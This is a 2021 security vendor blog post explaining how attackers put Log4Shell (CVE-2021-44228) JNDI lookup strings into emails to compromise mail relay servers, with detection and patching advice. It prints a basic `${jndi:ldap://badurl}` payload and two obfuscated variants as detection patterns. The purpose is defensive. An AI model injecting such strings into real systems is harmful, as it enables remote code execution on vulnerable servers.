Attackers Use Email + Log4j Vulnerability to Efficiently Exploit Email Infrastructure

December 20, 2021

Over the last few days, Abnormal has successfully blocked multiple attempts by attackers to deliver emails similar to these to our customers’ unsuspecting end users.

Log4j email examples

To the average recipient, these emails seem harmless, as they’re mostly gibberish with some suspicious-looking URLs.

However, the email recipient is not the intended target for these emails. Instead, the email content exploits a vulnerability presented by Log4j, a logging library broadly adopted by most Java developers, to compromise and even take over any email infrastructure that relays these email messages from senders to their destinations.

Curious how it does this? Read on.

What is the Log4Shell Vulnerability?

On December 9, 2021, a severe remote code vulnerability (CVE-2021-44228), a remote code execution (RCE) vulnerability with a CVSS score of 10 was revealed in Apache’s Log4j, a very common logging system used by Java developers. Early attacks include cryptomining, ransomware, data exfiltration, remote access trojans, and more.

When an operation attempts to write messages to logs, Log4j allows lookups to provide additional information to the log messages. This could include retrieving and adding to the message content, modifying timestamps, or changing environment details to give developers the clues they need if asked to debug the software. This information can be retrieved locally, or it can be retrieved from a remote machine. For the remote lookup, Log4j uses the Java Naming and Directory Interface (JNDI), which provides developers the means to look up objects using different services and protocols such as LDAP, DNS, RMI, and CORBA, to name a few.

Here is where the vulnerability lies. When an attacker feeds Log4j with a string containing a JNDI lookup command, Log4j reaches out to the remote server hosted by the attacker to fetch and execute the malicious Java code and successfully compromise the target server.

Log4j 1

How Does Log4j Affect Email Infrastructure?

As emails traverse from the sender’s mail client to the recipient’s inbox, they rely on multiple SMTP / MTA, DNS, Web servers and more, to send the email to the right incoming mail server and, finally, the inbox.

Log4j 2

You might think that you need only be concerned about servers where the incoming TCP connections service requests are handled directly by Java code and runtime libraries. But there may be other modules in the background that lie within these servers to perform other jobs for analytics or reporting purposes. And, there is a fair likelihood that they are processing email header information, and if and when they do, they are likely writing some of that information into their logs. Why? Because developers like as much specific information as possible to run root cause analysis when needed!

And herein lies the vulnerability. Log4j then parses the string and consequently retrieves and executes the malicious code, which compromises any and every server that uses the logging library that attempts to log information about the email.

How Has Abnormal Addressed the Vulnerability?

Our commitment to security and privacy requires that we conduct a full impact assessment as soon as a vulnerability like this is identified. Our assessment confirmed that Abnormal products do not use the affected versions of Log4j / Log4Shell / CVE-2021-44228.

The Abnormal information security team has performed additional verification to ensure that there are no externally visible JVM handlers that are affected by this vulnerability.

Am I Protected from Email Log4j Exploits with Abnormal?

Yes, Abnormal classifies any attempts to exploit Apache Log4j to mount an attack as malware. Our combination of behavioral signals, such as connections being created to utilize the Log4j payload and the presence of macros and trojans will be used to detect the rapidly changing forms of attacks in the wild. Furthermore, we combine our user behavioral signals with threat intelligence and sandboxing for a layered defense-in-depth approach to security.

How is Abnormal Providing Additional Protection to Customers?

Our information security and engineering teams have worked tirelessly to ensure our customers have complete protection from any email-borne Log4j related threats. This includes searching for attempted abuses of JNDI strings across our customers that match the following pattern:

${jndi:ldap://badurl}

And even those that attempt to obfuscate the string. For example:

${jndi:${lower:l}${lower:d}ap://badurl}
${${lower:j}${lower:n}${lower:di}:${lower:l}${lower:d}ap://badurl
}

This means that no matter how attackers attempt to use the JNDI strings within email messages, you’ll be protected from this threat.

How Do I Protect My Organization’s Infrastructure?

You will need to find any and all code in your network that is written in Java 2.14 or older, excluding security release 2.12.2, and check whether it uses the Log4j library. Out-of-date Log4j versions need to be updated immediately to the most recent versions, which are 2.12.2 for Java 7 and 2.17.0 for Java 8. You should also apply software patches from vendors as they become readily made available.

Abnormal will continue to detect and block never-before-seen (zero-day) attacks of this kind that target your company and routinely evade traditional threat intelligence-based solutions like secure email gateways.

If you have any questions or concerns that you would like Abnormal to address, please open a case in our support portal or email support@abnormalsecurity.com.

Not yet an Abnormal customer? Request a demo today to learn how Abnormal can enhance your email security capabilities and provide visibility into email threats that other solutions miss.

Related Posts

Blog customer communications leads to product innovation
Learn how customers have influenced the latest round of product enhancements to better protect your organization from email-borne threats.
Read More
Blog attack detection efficacy cover
Abnormal’s relentless pursuit of innovation significantly improves the detection efficacy of hidden payloads in emails by an additional 5%.
Read More
Blog mnru cover
Estimating both the time and cost to complete a task has been a continual challenge for engineering teams as long as I’ve been working in industry. Coordinating the complex interactions and execution task sequencing across multiple tasks and people is a complex, ever-evolving challenge, and one that most teams struggle with daily.
Read More
Blog what do phishing emails cover
Phishing attacks are on the rise; the FBI reports that such attacks cost $54 billion in 2020, and phishing complaints increased by a whopping 110% from 2019 to 2020. If you're one of the many people targeted by a phishing email, you're not alone.
Read More
Blog holiday scams cover
We've arrived at that time of year—a time for reflection and celebration and spending time with family, and also that time of year where the cyber grinches hope to spoil the holiday fun.
Read More
Log4j email blog cover
Over the last few days, Abnormal has successfully blocked multiple attempts by attackers to deliver emails similar to these to our customers’ unsuspecting end users.
Read More
Blog securitry privacy cover
Customers place tremendous trust in Abnormal to protect them from the full spectrum of attacks when they provide us access to the email stored in Microsoft 365 or Google Workspace. To that end, we’re focused on protecting your data and building your trust.
Read More
Blog podcast role cto
Tim Tully, Partner at Menlo Ventures, grew up in Silicon Valley, where a love for coding was kindled in him. Tim is a technologist to the core, which innately led him to become an elite technical leader at companies like Splunk and Yahoo.
Read More
Blog canadian visa cover
Abnormal Security recently identified a scam aimed at the Canadian electronic travel authorization (eTA) program, which bears a striking resemblance to a long-standing fraud scheme described in our post from several weeks ago targeting TSA travel program applicants.
Read More
Automate abuse mailbox cover
Managing and monitoring an Abuse Mailbox can be a significant pain point for IT security teams, particularly large organizations with thousands of employees.
Read More
Blog calendar invite attack cover
Meeting invites are one of the most common types of emails sent today, so it should come as no surprise that attackers have found a way to manipulate them. Scores of recipients that utilize Abnormal Security recently received emails that contained a .ics attachment—an invitation file commonly used to populate online calendar applications with meeting and event information.
Read More
Blog saving memory python cover
At a hyper-growth startup, a solution from six months ago will unfortunately no longer scale. The business is growing rapidly, and this traffic to this service in particular was growing at an unprecedented rate. We hit a point where it needed re-architecting to support 10x the current scale.
Read More